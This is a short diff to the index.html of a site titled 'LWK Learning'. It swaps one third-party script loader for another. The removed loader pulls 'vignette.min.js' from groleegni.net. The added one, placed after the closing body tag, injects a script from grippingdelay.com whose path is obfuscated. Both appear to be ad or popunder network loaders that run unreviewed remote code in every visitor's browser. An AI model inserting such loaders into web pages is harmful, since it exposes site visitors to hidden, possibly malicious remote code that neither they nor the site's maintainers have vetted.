--- a/index.html
+++ b/index.html
@@ -4,8 +4,7 @@
 <html lang="en">
 <head>
     <link rel="icon" type="image/x-icon" href="/favicon.png">
-    <script>(function(s){s.dataset.zone='10287784',s.src='https://groleegni.net/vignette.min.js'})([document.documentElement, document.body].filter(Boolean).pop().appendChild(document.createElement('script')))</script>
-<meta charset="UTF-8">
+    <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <title>LWK Learning</title>
 <style>
@@ -181,4 +180,16 @@
 
 </div>
 </body>
+    <script>
+(function(xwell){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = xwell || {};
+s.src = "\/\/grippingdelay.com\/blXhVgs.drGCl\/0DYcWXck\/ReDmv9MukZyUBlKkmP\/THYQ3KMXjqgC0CMCzZE\/tON\/j\/cDy\/OTDdQ\/zpMdgL";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
 </html>
